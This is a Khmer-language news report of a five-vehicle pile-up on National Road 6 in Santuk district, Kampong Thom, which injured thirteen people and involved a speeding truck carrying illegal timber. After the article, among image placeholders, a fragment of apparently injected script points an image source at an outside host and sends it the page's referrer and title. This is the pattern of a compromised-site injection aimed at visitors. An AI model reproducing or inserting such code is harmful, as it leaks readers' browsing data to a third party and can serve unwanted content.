រថយន្តតូចធំ៥គ្រឿងបុកបន្តកន្ទុយគ្នាបណ្តាលឲ្យមនុស្សរបួស់ធ្ងន់ស្រាល១៣នាក់នៅស្រុកសន្ទុក

កំពង់ធំ៖ រថយន្តចំនួន៥គ្រឿង បានបុកបន្តកន្ទុយគ្នា ក្នុងហេតុការណ៍គ្រោះថ្នាក់ចរាចរណ៍ដែលបានកើតឡើងនៅលើកំណាត់ផ្លូវជាតិលេខ៦ ត្រង់ចំនុចភូមិត្រើយមយ៉ាប ឃុំប្រាសាទ ស្រុកសន្ទុក ខេត្តកំពង់ធំ នៅវេលាម៉ោង ១០.២៥នាទី បណ្តាលឲ្យមានភ្ញៀវជនជាតិវៀតណាម៥នាក់ ៣បាក់ដៃ ២នាក់របួសស្រាល ចំណែកកម្ពុជា ទាំងរថយន្តតូចធំ ៨នាក់ សរុប១៣នាក់ ។

តាមការឲ្យដឹងពីសមត្ថកិច្ចនៃអធិការងទទួលផែនចរាចរណ៍ បានឲ្យដឹងថា មុនពេលកើតហេតុ មានរថយន្ត ក្រុងប្រភេទ២៥កៅអ៊ី បានបើកចេញពីភ្នំពេញ លុះមកដល់ចំនុចជញ្ជីងថ្លឹងរថយន្ត ស្របពេលដែលមានភ្លៀងធ្លាក់ខ្លាំងនិងជាចំនុចផ្លូវកោង ក៏បណ្តាលឲ្យរអិលធ្លាក់ទីស្នាមភ្លោះ ក្រឡាប់ផ្ងាជើង នៅវេលាម៉ោង៩និង៤៥នាទី ក្រោយមកមានរថយន្តជាច្រើនគ្រឿងនាំគ្នាបអង្អន់ល្បឿនដើម្បីមើលរថយន្តក្រឡាប់ គឺរថយន្តម៉ាក នីសាន់បើកមុខគេ ក្រោយមករថយន្តក្រុងរបស់ក្រុមហ៊ុនវៀតណាម បានបង្អន់ល្បឿង ស្រាប់តែរថយន្តយីឌុប ៥ភ្លៅដឹកឈើជាង៦ ម៉ែត្រគូប ម៉ាកហ៊ីយ៉ានដាយ ពាក់ស្លាកលេខ កំពង់ចាម 3A-2654 បុកពីក្រោយរថយន្តក្រុង ចំណែករថយន្តក្រុង ពាក់ស្លាកលេខ 51B- 19964 ពណ៌ក្រហម ជ្រុលទៅបុករថយន្តនីសាន់ ពាក់ស្លាកលេខ រដ្ឋ36-2-0/93 ពណ៌ស ពីក្រោយរបស់អង្គភាពស៊ីម៉ាក់ ចំណែករថយន្តស៊ីម៉ាក់ជ្រុលទៅបុកនិងរថយន្តហ្វតមួយគ្រឿងទៀត ក្រោយពីកើត ហេតុម្ចាស់រថយន្តហ្វត់ពុំមានអ្វីខូចខាតធ្ងន់ធ្ងរ ក៏ឡើករថយន្តបើកទៅដោយសុវត្តិភាព ចំណែករថយន្តដែលខូចខាត ធ្ងន់ធ្ងរគឺនៅចតកន្លែងកើតហេតុរងចាំដោះស្រាយ។
ក្នុងហេតុការណ៍គ្រោះថ្នាក់ចរាចរណ៍នេះ បណ្តាលរថយន្តយីឌុប៥ភ្លៅ ដឹកឈើដោយខុសច្បាប់ បើកបើរលឿន ព្រោះខ្លាចសមត្ថកិច្ចតាមទាន់ ក៏ជ្រុលទៅបុកចំម៉ាស៊ីនរបស់រថយន្តក្រុងរបស់ក្រុមហ៊ុន វៀតណាមបណ្តាលឲ្យរថយន្តទាំងពីគៀបខាំគ្នាជាប់ ខូចខាតយ៉ាងធ្ងន់ធ្ងរ រីឯរថយន្តនីសាន់ត្រូវបានខូចខាត ពីក្រោយ សមត្ថកិច្ចប៉ូលិសចរាចណ៍បានឲ្យដឹងថា តែកុងឡានក្រុងរបស់ក្រុមហ៊ុនវៀតណាម ឈ្មោះ ឡេ អ៊ូតាយ ភេទប្រុស អាយុ ៤៦ឆ្នាំ រីឯតៃកុងរថយន្តឯទៀតពុំមានឈ្មោះនោះទេ ដោយសារខ្លះទៅមន្ទីរពេទ្យ ខ្លះរត់គេចខ្លួនបាត់អស់ ។
សូមបញ្ជាក់ថានៅក្នុងខេត្តកំពង់ធំ បច្ចុប្បន្ន ផ្លូវមានស្ថានភាពរអិល នៅពេលមានភ្លៀងធ្លាក់ម្តងៗ ជាហេតុធ្វើ ឲ្យមានហេតុការណ៍គ្រោះថ្នាក់ចរាចរណ៍កើតឡើងជាបន្តបន្ទាប់ ដូច្នេះសុំឲ្យអ្នកធ្វើដំណើរឆ្លងកាត់ខេត្តកំពង់ ធំ បើកបរដោយមានការប្រុងប្រយ័ត្នខ្ពស់ ដើម្បីកាត់បន្ថយអាត្រាគ្រោះថ្នាក់ចរាចរណ៍ ។

image image image image images.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More